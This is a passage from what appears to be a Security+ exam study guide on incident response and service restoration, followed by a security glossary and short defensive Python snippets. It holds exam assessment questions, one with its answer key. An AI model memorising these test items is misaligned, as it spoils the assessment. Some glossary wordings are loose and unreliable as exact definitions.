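    if __name__ == "__main__":
        for name in unexpected_accounts():
            print(f"Review account not in baseline: {name}")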

Restoring service
Once the root problem is eradicated, you can get the network back to its normal functions. This isn't just the
same as turning everything on again: you need to make sure there's no lasting damage that you've missed, and
that the problem doesn't immediately recur before you really bring affected systems back into production.

1. Create a service restoration plan. It should not only include a timeline for restoring services, but also a
testing process beforehand and ongoing monitoring for a set period afterward.
2. Certify that restored systems are operational and secure, without signs of abnormal behavior.
3. Formally restore services.
4. Continue monitoring for repeating or secondary issues.
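
Step 4's ongoing monitoring can start with something as simple as a periodic reachability check while the restored systems are watched for regressions. The host names and ports below are placeholders; a real deployment would feed results into whatever monitoring platform you already use.

    import socket
    import time

    SERVICES = [("web01.example.com", 443), ("mail01.example.com", 25)]   # placeholders

    def is_up(host, port, timeout=3):
        """Return True if a TCP connection to host:port succeeds."""
        try:
            with socket.create_connection((host, port), timeout=timeout):
                return True
        except OSError:
            return False

    def watch(interval=60):
        """Poll restored services and report any that stop responding."""
        while True:
            for host, port in SERVICES:
                if not is_up(host, port):
                    print(f"WARNING: {host}:{port} not responding")
            time.sleep(interval)

    if __name__ == "__main__":
        watch()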

CompTIA Security+ Exam SY0-501 499


Chapter 11: Disaster planning and recovery / Module C: Incident response

Following up on incidents
Once services are restored and forensic information has been handed over to investigators, the followup
process begins with asking questions. The answers will determine what, if anything, needs to be done next, and
should be drafted into a report for submission to the response team and management. This is commonly
called the lessons learned phase.

 What was the total extent of the incident?


• Scope
• Cost
• Duration
 Was the response adequate?
• Was preparation sufficient?
• Was detection timely?
• Were communications and documentation thorough and clear?
 How can similar future incidents be prevented?
• Education
• Policies
• Security measures

Discussion: Examining the incident response process


1. Identify people in your organization who might have the skills to join an incident response team.
Answers may vary.
2. What is the difference between a forensic investigation and just keeping thorough documentation of your
findings?
The big difference is that a forensic investigation produces evidence that is suitable for presenting to a
court. This means you have to establish a chain of custody, make it clear that the findings have not been
altered or falsified, and will answer any necessary legal, as well as practical, questions a court may have.
3. How can problems arise between incident containment and incident investigation?
The steps needed to contain an incident quickly and completely might interfere with evidence needed for
later investigation. It's important to reconcile the two based on the urgency of containment.
4. Identify the response steps you've taken, or seen taken, for a past security incident. Consider both what
happened, and how the process could have been improved.
Answers may vary.

500 CompTIA Security+ Exam SY0-501


Chapter 11: Disaster planning and recovery / Module C: Incident response

Assessment: Incident response


1. Order the steps of the incident response process.

1. Containment
2. Eradication
3. Followup
4. Identification
5. Investigation
6. Preparation
7. Recovery
6, 4, 1, 5, 2, 7, 3
2. What is eDiscovery? Choose the best answer.
 A process for identifying security incidents.
 A process for sharing electronic forensic data.
 A standard for forensic backup software.
 A software application used to track security incidents.

3. You should start choosing an incident response team as soon as you've identified an incident. True or
false?
 True
 False

4. After a security incident you rush to take a screenshot of a telltale running process before you leisurely
take a backup of suspicious files on the hard drive. What forensic principle are you exercising? Choose
the best response.
 Audit trail
 Chain of custody
 eDiscovery
 Order of volatility

5. Why is it important to record a time offset when collecting evidence?


 To compensate for logging systems that don't record precise times
 To compensate for time differences between multiple systems
 To document the precise order of events
 To document the precise timing of events

CompTIA Security+ Exam SY0-501 501


Chapter 11: Disaster planning and recovery / Summary: Disaster planning and recovery

Summary: Disaster planning and recovery


You should now know:
 How to create and test business continuity plans, including business impact analysis and disaster
recovery plans.
 How to identify recovery objectives, implement fault tolerance and redundancy for critical systems,
and create sound data backup policies.
 About the principles of digital forensics, and how to design an effective incident response plan.

502 CompTIA Security+ Exam SY0-501


Appendix A: Glossary

CompTIA Security+ Exam SY0-501 503


Appendix A: Glossary

504 CompTIA Security+ Exam SY0-501


Appendix A: Glossary

802.1x - An authentication protocol used for network access control. One implementation is the WPA-Enterprise mode on Wi-Fi networks.
AAA - Authentication, Authorization, and Accounting. A three-step security framework that comprises verification of a user's identity, specification of the exact resources that user is allowed to access, and tracking that user's actions for later review.
account expiration - Policies that automatically disable or delete accounts after a set period, either absolute or since the last login.
ACL - Access control list. A list attached to a resource, giving permissions, or rules, about exactly who can access it.
Active Directory - A Microsoft directory service based on LDAP and Kerberos, used by Windows domains.
AES - Advanced Encryption Standard. A strong and widely used encryption standard, supporting 128, 192, and 256-bit key lengths.
AES-CCMP - The strongest available Wi-Fi encryption, supported by WPA2 and most WPA devices.
ALE - Annual loss expectancy. In quantitative risk assessment, the cost per year you can expect from a given threat, or the SLE x ARO.
algorithm - A well-defined set of instructions to perform a self-contained task, such as encryption or decryption of data.
ARO - Annual rate of occurrence. In quantitative risk assessment, the number of times you can expect a given type of loss to occur per year.
ARP - Address Resolution Protocol. Used to identify the physical (MAC) address of a given IP address.
ARP poisoning - A spoofing attack that targets the Layer 2 Address Resolution Protocol.
attack surface - The summary of all points in a host or network that an attacker can target.
attack vector - (Also known as threat vector.) The mechanism of a given threat to an asset. Examples include malware, fraudulent email messages, and password cracking attempts.
auditing - The formal process of reviewing key elements of your network infrastructure. Commonly includes examination of security logs, incident response reports, user/administrator activity logs, user permissions, device configurations, and software installations.
AUP - Acceptable use policy. Specifies how authorized users are allowed to utilize system resources, such as hardware, software, and network services.
authentication - A process that ensures and confirms a user's identity using credentials supplied by the user.
authentication factor - Any element of the authentication process that serves to prove your identity. Common authentication factors include passwords, fingerprints, and smart cards.
authorization - Specifying the exact resources a given authenticated user is allowed to access.
availability - Ensuring that information is always easily accessible to authorized users. This includes preventing data loss and preserving connectivity, performance, and usability.
backdoor - Any hidden way into a system or application that bypasses normal authentication systems.
banner grabbing - Using routine communications with a host to gain information about its running services and open ports.
baseline - A minimum set of defined security standards.
bastion host - A host that's directly exposed to an untrusted network, and hardened against network attacks.
bcrypt - A hashing algorithm designed for password storage, key derivation, and key stretching. bcrypt combines passwords with a 128-bit salt to create a 184-bit hash.
big data - Data sets too large to be handled by traditional data processing applications, but commonly seen in scientific data collection, internet search and tracking data, and business/finance. It requires specialized tools to analyze and secure.
biometrics - Personal physical characteristics, such as fingerprints and retinal patterns, used as inherence elements in the authentication process.
BitLocker - Microsoft's full drive encryption feature built into Windows, which encrypts entire volumes so that their contents are unreadable without the proper key.

CompTIA Security+ Exam SY0-501 505


Appendix A: Glossary

blacklist - A permissions list containing only explicit denials.
block cipher - A symmetric cipher that encrypts plaintext in fixed-size blocks, applying the complete key to each block. Blocks are typically 64 or 128 bits; the cipher can use any key size.
botnet - A network of malware-infected computers that can perform attacks or do other tasks as directed by its controller, without the knowledge of the actual system owners.
broadcast address - A MAC or IPv4 address that designates a packet that should be read by all listening hosts.
broadcast domain - A network segmentation unit where all nodes can reach each other by broadcast at the data link layer.
buffer overflow - The end result of including too much information in a request sent to an application, thereby overfilling the memory buffer and causing overflow into adjacent memory.
BYOD - Bring your own device. A security policy that allows or even encourages users to employ their own personal devices freely on the network.
CA - Certificate authority. A third-party entity responsible for assignment, verification, and revocation of digital certificates.
certificate - A special file attesting the identity of the computer or user that presents it. The certificate is cryptographically signed so that other computers can verify its authenticity by one of several possible means.
chain of custody - Documentation about the history of a piece of forensic evidence from its discovery, to demonstrate that it was collected legally and was not subsequently altered.
CHAP - Challenge-Handshake Authentication Protocol. A PPP protocol that uses a three-way handshake, with security provided by a shared secret that isn't transmitted over the network.
CIA triad - Confidentiality, integrity, and availability. The three primary goals of all information security.
cipher suite - In SSL/TLS connections, a linked set of cryptographic methods. A suite contains separate algorithms for bulk encryption, key exchange, hashing, and pseudorandom number generation.
ciphertext - In cryptography, data that has been encrypted and is unreadable without the proper key.
client - A piece of computer hardware or software that accesses a service made available by a server.
cloud computing - A service model for network-accessible computing services, which includes on-demand self-service, broad network access, resource pooling, rapid elasticity, and measured service.
confidentiality - Ensuring that information is viewable only by authorized users or systems, and is either inaccessible or unreadable to unauthorized users.
content filters - Software applications designed to restrict network access to unwanted or objectionable content, as opposed to malware or attacks.
content switch - A higher layer router that balances workload between multiple identical servers, while making them look like a single server to the outside network.
control - Any tool, device, or human activity used to decrease risk or otherwise achieve security goals.
cookies - Small text files stored in a user's browser, containing information relevant to the web sites that the user visits.
CRC - Cyclic redundancy check. An error detecting code that can detect accidental alterations of stored or transmitted data, but is not secure against malicious alteration.
cross-site request forgery - (CSRF or XSRF) An attack on a legitimate session between a legitimate web server and another user that exploits the site's trust of the user, forging or altering requests from the client to the server within the context of the session.
cross-site scripting - (XSS) A web application attack where the attacker injects malicious scripts into a web page viewed in the victim's browser. The web page containing the script appears to be from a trusted site, so the browser will trust the script as well.
CSR - Certificate signing request. A request sent to a CA containing all identifying information needed to request a new digital certificate.
DAC - Discretionary Access Control. An access control model in which the owner or creator of each controlled object decides who can access it and what permissions they have.
defense in depth - A security strategy that arrays controls in multiple layers so that an attacker who bypasses a single layer will not gain control of the entire system or network.

506 CompTIA Security+ Exam SY0-501


Appendix A: Glossary

DES - Data Encryption Standard. A now-obsolete block cipher using a 56-bit key. While a long-used standard, DES is too weak for modern use.
DHE - Diffie-Hellman Ephemeral. A protocol used to securely exchange temporary (ephemeral) keys used for bulk encryption.
digital certificate - See certificate.
DLP - Data loss prevention. Software used to prevent users from accidentally or maliciously sharing particular types of data outside your organization.
DMZ - Demilitarized zone, or perimeter network. A network zone that's under the organization's direct control but separate from, and less trusted than, the internal network.
DNS - Domain Name System. A hierarchical directory service that stores assigned domain names and their corresponding IP addresses.
DNS poisoning - An attack that compromises or impersonates domain name servers to redirect or block network requests.
DOM - Document Object Model. The application programming interface used by HTML and XML documents, which defines their structure and the way browsers access and manipulate them; changing objects within the model changes the presentation of the page.
DoS - Denial-of-service. Attacks designed to impair or block legitimate users' ability to use a network resource.
DPI - Deep packet inspection. A firewall feature that can inspect packet contents to enforce rules based on high-level protocols a traditional firewall would not recognize.
DSA - Digital Signature Algorithm. An asymmetric encryption algorithm designed for digital signatures. It has similar uses to RSA, but for some implementation reasons is currently less popular.
dual-homed server - A bastion host with two NICs, configured as a firewall to bridge the inside and outside networks.
EAP - Extensible Authentication Protocol. A PPP extension that can also be used for wireless authentication. Not an authentication method in itself, but rather a message format and set of common functions that can be used to support a wide variety of specific authentication methods.
eDiscovery - Electronic discovery. A legal process in which two parties in a court case can obtain digital evidence from each other.
EFS - Encrypting File System. Allows encryption of individual drives and folders on any NTFS volume. EFS-encrypted files are unreadable to other users on the same computer.
EMI - Electromagnetic interference. Signal noise from electromagnetic sources that interferes with other equipment, especially data cables or wireless transceivers.
encryption - A security control method that uses mathematical processes to render data unreadable to those without the proper decryption key.
ephemeral key - A cryptographic key that is generated for each execution of a key establishment process.
event - Any meaningful change in a system's state that is both detectable and happened at a specific time.
failover - A method of protecting computer systems in which standby equipment automatically takes over when the main system fails.
false negative - A type of event evaluation in which a problem occurred but the analysis mistook it for benign behavior.
false positive - A type of event evaluation in which the behavior was benign but the analysis mistook it for a problem.
fault tolerance - An availability control system designed to continue functioning even when a hardware or software component fails.
FDE - Full drive encryption. A type of hardware-based encryption that encrypts all data on a drive, rendering it unreadable unless the key is entered during system boot or when it's connected.
federated identity management - Allows authentication systems to be shared across multiple systems or networks that share authentication standards even if they're not directly associated with each other. Members of a federation can share authentication tokens, access shared authentication servers, or otherwise behave as though they're part of a unified security system.
firewall - A computer system or network component that is designed to block unauthorized access while permitting outward communication.

CompTIA Security+ Exam SY0-501 507


Appendix A: Glossary

forensics - The science of collecting evidence that's admissible in court. To be admissible, forensic evidence must be relevant to a legal case, sufficient in detail to prove a claim, and have an audit trail proving that it was collected legitimately and hasn't been altered since.
FQDN - Fully qualified domain name. The complete domain name for a specific computer, or host, on the Internet. Consists of two parts: the hostname and the domain name.
frame - A digital data transmission unit in computer networking and telecommunication. A frame typically includes frame synchronization features consisting of a sequence of bits or symbols that indicate to the receiver the beginning and end of the payload data within the stream of symbols or bits it receives.
fuzzing - A probe-based attack that inserts random or invalid data into header fields or application data inputs. In extreme cases, fuzzing attacks can crash applications or entire systems, or gain access permissions; more commonly they're a way to learn how a service or application responds to non-standard input, enabling future attacks.
GPG - GNU Privacy Guard. The GNU project's free software implementation of the OpenPGP standard as defined by RFC4880. GPG is specifically a command line tool that enables you to encrypt and sign your data and communication, and includes a key management system as well as access modules for all kinds of public key directories.
GPO - Group policy object. In Windows, a collection of settings that define what a system will look like and how it will behave for a defined group of users.
guest network - In a WAP system, a separate network access point with its own SSID and login credentials. Guest clients are on a separate network from internal clients, and can't communicate with them directly. They can only use the WAP for Internet access.
hardening - The process of securing a system by reducing its surface of vulnerability, which is larger when a system performs more functions. This typically includes changing default passwords, removal of unnecessary software, unnecessary usernames or logins, and the disabling or removal of unnecessary services.
hash table - A database that stores the hashes used to uniquely identify files and other data elements in a storage system. Hash tables are valuable for searching and organizing large amounts of data, for example to recognize duplicate files even if they're stored in different folders or under different names.
hashing - The transformation of a string of characters into a usually shorter fixed-length value or key that represents the original string. Hashing is used to index and retrieve items in a database because it is faster to find the item using the shorter hashed key than to find it using the original value.
HIPAA - Health Insurance Portability and Accountability Act.
HMAC - Hash-based message authentication code.
honeypot - A decoy system designed to be attractive and accessible to attackers. It has no useful resources and is isolated from the rest of the network. A honeypot is monitored to gather information on attackers without actually risking the consequences of an attack on real systems.
host - A computer or other device connected to a computer network. A network host may offer information resources, services, and applications to users or other nodes on the network.
hosts file - An operating system file, in plain text format, that maps hostnames to IP addresses.
HTTPS - HTTP Secure. A protocol used for secure web pages and sites. It includes encryption services.
hypervisor - A software abstraction layer that runs VMs as applications, effectively an operating system for operating systems. To the VM the hypervisor looks like underlying hardware, but it's actually just allocating host resources and allowing multiple VMs to simultaneously share them.
ICMP - Internet Control Message Protocol. A protocol used by network devices, including routers, to send error messages and operational information indicating, for example, that a requested service is not available or that a host or router could not be reached.
ICS - Industrial control system. A general term that encompasses several types of control systems and the associated instrumentation used in industrial production technology, including supervisory control and data acquisition systems, distributed control systems, and other smaller control system configurations.
IDS - Intrusion detection system. A fundamentally passive monitoring system designed to keep administrators aware of malicious activity: it can record detected intrusions in a database and send alert notifications, but it relies on humans to actually take action.

508 CompTIA Security+ Exam SY0-501


Appendix A: Glossary

implicit deny - An ACL model in which access is denied unless a rule explicitly allows it.
incident - A warning that there may be a threat to information or computer security. The warning could also be that a threat has already occurred.
information security - The practice of preventing unauthorized access, use, disclosure, disruption, modification, inspection, recording, or destruction of information.
injection - A class of attacks that rely on injecting data into a web application in order to facilitate the execution or interpretation of malicious data in an unexpected manner. Examples include XSS, SQL injection, header injection, log injection, and full path disclosure.
integer overflow - Setting an integer variable to a value that exceeds the maximum size set aside to store it, usually through addition or multiplication functions.
integrity - The maintenance of, and the assurance of the accuracy and consistency of, data over its entire life-cycle. Integrity is a critical aspect of the design, implementation, and usage of any system which stores, processes, or retrieves data.
Internet of Things (IoT) - The interconnection via the Internet of computing devices embedded in everyday objects, enabling them to send and receive data.
Internet Protocol (IPv4 and IPv6) - A set of rules governing the format of data sent over the Internet or other network.
Internet Protocol Security (IPsec) - A network protocol suite that authenticates and encrypts the packets of data sent over a network. IPsec includes protocols for establishing mutual authentication between agents at the beginning of the session and negotiation of cryptographic keys to use during the session.
Intrusion prevention systems (IPS) - Monitoring systems that build on IDS functions by automatically taking action against detected malicious activity, such as blocking or resetting suspect connections, rather than relying on humans to respond.
IV - Initialization vector. An arbitrary number that can be used along with a secret key for data encryption. This number, also called a nonce, is employed only one time in any session.
Kerberos - A network authentication protocol that works on the basis of 'tickets' to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.
key escrow - An arrangement in which the keys needed to decrypt encrypted data are held in escrow so that, under certain circumstances, an authorized third party may gain access to those keys.
Layer 2 Tunneling Protocol (L2TP) - A tunneling protocol used to support virtual private networks (VPNs) or as part of the delivery of services by ISPs. It does not provide any encryption or confidentiality by itself. Rather, it relies on an encryption protocol that it passes within the tunnel to provide privacy.
LDAP - Lightweight Directory Access Protocol. An application protocol used over an IP network to manage and access the distributed directory information service.
LEAP - Lightweight EAP. A Cisco-proprietary version of EAP, the authentication protocol used in wireless networks and point-to-point connections. It is designed to provide more secure authentication for 802.11 WLANs that support 802.1X port access control.
least privilege - A security principle which requires that, in a particular abstraction layer of a computing environment, every module (such as a process, a user, or a program, depending on the subject) must be able to access only the information and resources that are necessary for its legitimate purpose.
load balancer - A device that acts as a reverse proxy and distributes network or application traffic across a number of servers. Load balancers are used to increase capacity and reliability of applications.
logic bomb - A piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met. For example, a programmer may hide a piece of code that starts deleting files (such as a salary database trigger), should they ever be terminated from the company.
loopback address - A special IP number (most commonly 127.0.0.1) that points right back to the local host.
MAC address - A unique identifier assigned to network interfaces for communications at the data link layer of a network segment. MAC addresses are used as a network address for most IEEE 802 network technologies, including Ethernet and Wi-Fi.

CompTIA Security+ Exam SY0-501 509


Appendix A: Glossary

MAC filtering - A security access control method whereby the 48-bit address assigned to each network card is used to determine access to the network.
malware - Software that is intended to damage or disable computers and computer systems.
Mandatory Access Control (MAC) - A type of access control by which the operating system constrains the ability of a subject or initiator to access or generally perform some sort of operation on an object or target.
MD5 - Message Digest 5. A cryptographic algorithm that takes an input of arbitrary length and produces a message digest that is 128 bits long. The digest is sometimes also called the "hash" or "fingerprint" of the input.
MDM - Mobile device management. The administrative area dealing with deploying, securing, monitoring, integrating and managing mobile devices, such as smartphones, tablets and laptops, in the workplace.
MTBF - Mean time between failures.
MTBSI - Mean time between service incidents.
MTTF - Mean time to failure.
MTTR - Mean time to repair.
multifactor authentication - A security framework that requires more than one method of authentication from independent categories of credentials to verify the user's identity for a login or other transaction.
multihomed firewall - Also known as three-homed firewall. A firewall system connecting the three zones (inside, outside, and DMZ) such that traffic passing between any two zones is protected by the firewall. Thus, not only is the inside protected from both the outside and DMZ, the DMZ is protected from outside.
mutual authentication - A security feature in which a client process must prove its identity to a server, and the server must prove its identity to the client, before any application traffic is sent over the client-to-server connection.
NAC - Network Access Control. An approach to computer security that attempts to unify endpoint security technology (such as antivirus, host intrusion prevention, and vulnerability assessment), user or system authentication, and network security enforcement.
NAT - Network address translation. A method of remapping one IP address space into another by modifying network address information in Internet Protocol (IP) datagram packet headers while they are in transit across a traffic routing device.
need to know - A restriction scheme in which, even if one has all the necessary official approvals (such as a security clearance) to access certain information, one would not be given access to such information unless one has a specific need to know; that is, access to the information must be necessary for one to conduct one's official duties.
network segmentation - The splitting of a computer network into subnetworks, each being a network segment or network layer. This approach allows organizations to enhance security and group applications and like data together for access by a specific group (e.g., finance).
network switch - Also called switching hub or bridging hub. A central device that connects other devices together on a computer network by using packet switching to receive, process, and forward data to the destination device.
NFC - Near-field communication. A set of communication protocols that enable two electronic devices, one of which is usually a portable device such as a smartphone, to establish communication by bringing them within 4 cm (1.6 in) of each other.
nonce - An arbitrary number used only once in a cryptographic communication.
non-repudiation - A security framework in which authenticity is verified in such a way that even the information's author can't dispute creating it.
offboarding - The identity and access management processes surrounding the removal of an identity for an employee who has left the organization. May also be used to describe the restriction of certain access rights when an employee has changed roles within the organization.
OLA - Operational-level agreement. Defines the interdependent relationships in support of a service-level agreement (SLA). It describes the responsibilities of each internal support group toward other support groups, including the process and timeframe for delivery of their services.
onboarding - The addition of a new employee to an organization's identity and access management system. This term is also used if an employee changes roles within the organization and is granted new or expanded access privileges.

510 CompTIA Security+ Exam SY0-501


Appendix A: Glossary

order of volatility - The order in which you should collect forensic security evidence. Highly volatile data is easily lost, such as data in memory when you turn off a computer. The least volatile data, such as printouts, is relatively permanent.
OTP - One-time password. A single-use PIN or password that is valid for a single session, so it can't be stolen and reused. The OTP still has to be known to both the user and the authenticator somehow, so it's a challenge to accurately create one.
packet - A short, fixed-length section of data that is transmitted as a unit in an electronic communications network. Each packet contains the address of its origin and destination, and information that connects it to the related packets being sent.
PAT - Port address translation. An extension to network address translation (NAT) that permits multiple devices on a local area network (LAN) to be mapped to a single public IP address. The goal of PAT is to conserve IP addresses.
PBKDF2 - Password-Based Key Derivation Function 2.
PBX - Private branch exchange. A telephone system within an enterprise that switches calls between enterprise users on local lines while allowing all users to share a certain number of external phone lines.
PCI DSS - Payment Card Industry Data Security Standard.
PEAP - Protected EAP. A protocol that secures EAP authentication in a TLS tunnel.
penetration test - An attempt to evaluate the security of an IT infrastructure by safely trying to exploit vulnerabilities. These vulnerabilities may exist in operating systems, services and application flaws, improper configurations, or risky end-user behavior.
perfect forward secrecy - A property of secure communication protocols in which compromise of long-term keys does not compromise past session keys.
perimeter network - A physical or logical subnetwork that contains and exposes an organization's external-facing services to an untrusted network, usually a larger network such as the Internet. (See also DMZ.)
PGP - Pretty Good Privacy. Data encryption software that uses two digital equivalents of physical keys: a public key used for encrypting data that can be given by its owner to anyone who wants to send a secure transmission; and a private key used for decrypting the data and known only to its owner.
pharming - An application of DNS poisoning in which an attacker redirects traffic for a legitimate website to a malicious imitator. Much like in a phishing attack, victims might be tricked into entering credentials or other sensitive data, or into downloading malware.
phishing - An attempt to obtain sensitive information such as usernames, passwords, and credit card details (and, indirectly, money), often for malicious reasons, by disguising as a trustworthy entity in an electronic communication.
PII - Personally identifiable information.
plaintext - Ordinary readable text before being encrypted into ciphertext or after being decrypted.
port forwarding - Routing inbound traffic to local addresses based on the destination port. For example, all traffic addressed to TCP port 80 can be sent to the company web server, while traffic addressed to ports 20-21 is forwarded to the FTP server.
posture assessment - The evaluation of system security based on the applications and settings that a particular system is using. This ensures that the client system meets certain security rules; for example, that it has appropriate anti-virus software installed, and that its operating system and relevant software is updated with the latest security updates.
PPP - Point-to-Point Protocol. A data link (layer 2) protocol used to establish a direct connection between two nodes. It is used on everything from dialup connections to SONET leased lines, and can carry IP, IPX, and other high-level traffic.
PPTP - Point-to-Point Tunneling Protocol. A very basic VPN protocol that encapsulates PPP packets over GRE to provide VPN tunneling features, allowing it to carry any protocol PPP can, including IP, IPX, and NetBEUI.
principal - An entity (user) that can be authenticated by a computer system or network.

CompTIA Security+ Exam SY0-501 511


Appendix A: Glossary

private key - A tiny bit of code that is paired with a public key to set off algorithms for text encryption and decryption. It is created as part of public key cryptography during asymmetric-key encryption and used to decrypt and transform a message to a readable format.
private network range - Part of internal LAN configuration, these network addresses aren't routable on the Internet, but are instead commonly used on home or office networks.
privilege escalation - A security attack in which an ordinary user account or application gets administrative rights that enable it to do more harm.
Protected distribution system - In US government terminology, a wireline or fiber-optics telecommunication system that includes terminals and adequate acoustical, electrical, electromagnetic, and physical safeguards to permit its use for the unencrypted transmission of classified information.
protocol analyzer - Also known as network analyzer or packet analyzer. Captures and analyzes network traffic. Can read packet headers to determine traffic patterns, or view protocol information in depth.
proxy server - An intermediary between a client and a server: instead of the client contacting the server directly, it contacts the proxy server, which in turn contacts the remote server. In return, the remote server communicates with the client through the proxy server.
PSK - Pre-shared key. A shared secret which was previously shared between the two parties using some secure channel before it needs to be used.
public key cryptography - A cryptography method that uses two mathematically-related keys: data encrypted with one key can only be decrypted with the other. Called "public" because one key can be shared with the public without compromising the security of the other.
RADIUS - Remote Authentication Dial-In User Service.
RAID - Redundant array of independent disks.
rainbow table - A precomputed table for reversing cryptographic hash functions, usually for cracking password hashes. Commonly used in recovering a plaintext password up to a certain length consisting of a limited set of characters.
RAS - Remote Access Service.
RBAC (Role-based access control) - A method of regulating access to computer or network resources based on the roles of individual users within an enterprise. In this context, access is the ability of an individual user to perform a specific task, such as view, create, or modify a file.
RBAC (Rule-based access control) - A method of regulating access to computer or network resources that dynamically assigns roles to users based on criteria defined by the custodian or system administrator.
RC4 - Rivest Cipher 4.
redundancy - System design in which a component is duplicated so if it fails there will be a backup. (Redundancy has a negative connotation when the duplication is unnecessary or is simply the result of poor planning.)
remote code execution - A security vulnerability that allows an attacker to execute code from a remote server. The most dangerous result of an application attack, since in conjunction with privilege escalation it can give the attacker full control of the remote computer.
residual risk - The threat that remains after all efforts to identify and eliminate risk have been made.
risk - Any event or action that could cause a loss of or damage to computer hardware, software, data, information, or processing capability.
rogue device - A wireless device that remains connected to a system but does not have permission to access and operate in a network.
role-based training - Training that is customized to the specific role an employee holds in the organization. Training content is tailored to classes of users based on their workplace duties and expected technical expertise.
root certificate - A public key certificate that identifies a root certificate authority (CA). Root certificates are self-signed and form the basis of an X.509-based public key infrastructure (PKI).
rootkit - A set of software tools that enable an unauthorized user to gain control of a computer system without being detected.
routing table - The set of rules and data that the router uses to map its surroundings. On a large network, this could be a lot of information, including planning several hops across multiple routers.

512 CompTIA Security+ Exam SY0-501


Appendix A: Glossary

RSA - Rivest, Shamir, & Adleman. A cryptosystem for public-key encryption, widely used for securing sensitive data, particularly when being sent over an insecure network such as the internet.
S/MIME - Secure/Multipurpose Internet Mail Extensions.
salt - In cryptography, random data that is used as an additional input to a one-way function that "hashes" a password or passphrase. Closely related to the concept of nonce.
SAN - Storage area network. A network that provides access to consolidated, block level data storage. Primarily used to make storage devices, such as disk arrays, tape libraries, and optical jukeboxes, accessible to servers so that the devices appear to the operating system as locally attached devices.
sandbox - A type of software testing environment that enables the isolated execution of software or programs for independent evaluation, monitoring, or testing. May be known as a test server, development server, or working directory.
sanitization - Erasing a storage device, such as a computer hard drive, so thoroughly that no residual data can be collected from the device.
SCADA - Supervisory control and data acquisition.
SCSI - Small Computer Systems Interface.
separation of duties (SoD) - An internal control designed to prevent error and fraud by ensuring that at least two individuals are responsible for the separate parts of any task. SoD involves breaking down tasks that might reasonably be completed by a single individual into multiple tasks so that no one person is solely in control.
server - A computer designed to process requests and deliver data to other (client) computers over a local network or the internet. There are a number of categories of servers, including print servers, file servers, network servers, and database servers.
session - Refers to a limited time of communication between two systems. Some sessions involve a client and a server, while other sessions involve two personal computers.
session key - A single-use symmetric key used for encrypting all messages in one communication session.
SFTP - SSH File Transfer Protocol.
SHA - Secure Hash Algorithm.
SIEM - Security Information and Event Management.
single point of failure - A system component whose failure, by itself, will stop the entire system from working.
SLE - Single loss expectancy. The cost of any single loss.
smart cards - Authentication cards with integrated circuits built in. A smart card's chip holds basic identifying information like a magnetic stripe would; it can also hold digital certificates, store temporary data, or even perform cryptographic processing functions to keep its data secure.
sniffer - A program that monitors and analyzes network traffic, detecting bottlenecks and problems. Also known as protocol analyzer.
SOAP - Simple Object Access Protocol.
social engineering - The use of deception to manipulate individuals into divulging confidential or personal information that may be used for fraudulent purposes.
spam - Irrelevant or unsolicited messages sent over the Internet, typically to a large number of users, for the purposes of advertising, phishing, spreading malware, etc.
SPI - Stateful packet inspection. A firewall technology that monitors the state of active connections and uses this information to determine which network packets to allow through the firewall.
spoofing - A type of scam where an intruder attempts to gain unauthorized access to a user's system or information by pretending to be the user. The main purpose is to trick the user into releasing sensitive information in order to gain access to one's bank account or computer system, or to steal personal information, such as passwords.
SQL - Structured Query Language.
SSH - Secure Shell.
SSL - Secure Sockets Layer. The standard security technology for establishing an encrypted link between a web server and a browser. This link ensures that all data passed between the web server and browsers remain private and integral.
SSO - Single sign-on. Systems that allow one set of user credentials to give access to a large number of services.

CompTIA Security+ Exam SY0-501 513


Appendix A: Glossary

steganography - A form of cryptography that hides secret messages in seemingly innocuous information, or even out of sight entirely, so that a casual onlooker doesn't even know a message is there.

storage segmentation - Separating a particular part of device storage so that it can be encrypted and controlled separately from the rest.

stream cipher - A symmetric key cipher where plaintext digits are combined with a pseudorandom cipher digit stream (keystream). In a stream cipher, each plaintext digit is encrypted one at a time with the corresponding digit of the keystream, to give a digit of the ciphertext stream.

structured walkthrough - An organized procedure for a group of peers to review and discuss the technical aspects of software development and maintenance deliverables and outputs. The primary objectives are to find errors and to improve the quality of the product.

subnet - An identifiably separate part of an organization's network. Typically, a subnet may represent all the machines at one geographic location, in one building, or on the same local area network (LAN).

subnet mask - A 32-bit number that masks an IP address, dividing it into a network address and a host address. It is made by setting all network bits to "1" and all host bits to "0".

switching loop - Formed when multiple paths join any two switches, passing the same frames around and around until they crowd out all other traffic.

TACACS+ - Terminal Access Controller Access Control System Plus.

tailgating - Also known as piggybacking. Getting into a secure area by tagging along right behind someone who has legitimate access, with or without their knowledge.

TCP - Transmission Control Protocol.

thin client - A networked computer with few locally stored programs and a heavy dependence on network resources. It may have very limited resources of its own, perhaps operating without auxiliary drives or even software applications. Typically, a thin client is one of many network computers that share computation needs by using the resources of one server.

threat - Anything that has the potential to cause serious harm to a computer system. A threat may or may not ever occur, but it must be accounted for because of the damage it could do.

three-way handshake - A three-step method used in a TCP/IP network to create a connection between a local host/client and a server. It requires both the client and server to exchange SYN and ACK packets before actual data communication begins.

TKIP - Temporal Key Integrity Protocol.

TLS - Transport Layer Security.

transitive trust - A two-way relationship automatically created between parent and child domains in a Microsoft Active Directory forest. When a new domain is created, it shares resources with its parent domain by default, enabling an authenticated user to access resources in both the child and the parent.

Triple DES (3DES) - A symmetric-key block cipher that applies the DES cipher algorithm three times to each data block.

Trojan - A program that appears legitimate but performs some illicit activity when run. It may be used to locate password information, make the system more vulnerable to future entry, or simply destroy the user's stored software and data.

typo squatting - A form of cybersquatting (and possibly brandjacking) that relies on mistakes, such as typos, made by internet users when inputting a website address into a web browser. Should a user accidentally enter an incorrect website address, they may be led to any URL, including an alternative website owned by a cybersquatter.

UDP - User Datagram Protocol.

UPS - Uninterruptible power supply.

URL hijacking - See typo squatting.

UTM - Unified threat management.

validation - The process of ensuring that a program operates on clean, correct, and useful data. It uses routines that check the correctness, meaningfulness, and security of data input to the system.

virtualization - The process of creating a virtual (rather than actual) version of a device or resource, such as a server, storage device, network, or even an operating system, where the framework divides the resource into one or more execution environments.
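The stream cipher entry above describes XORing plaintext with a keystream. The following toy Python sketch illustrates the idea only; it uses an ordinary seeded PRNG as the keystream generator, which is not cryptographically secure and must never be used to protect real data:

    # Toy stream cipher: XOR each plaintext byte with the next keystream byte.
    # Real stream ciphers use cryptographically secure keystream generators.
    import random

    def keystream(seed, length):
        rng = random.Random(seed)               # NOT cryptographically secure
        return bytes(rng.randrange(256) for _ in range(length))

    def xor_stream(data, seed):
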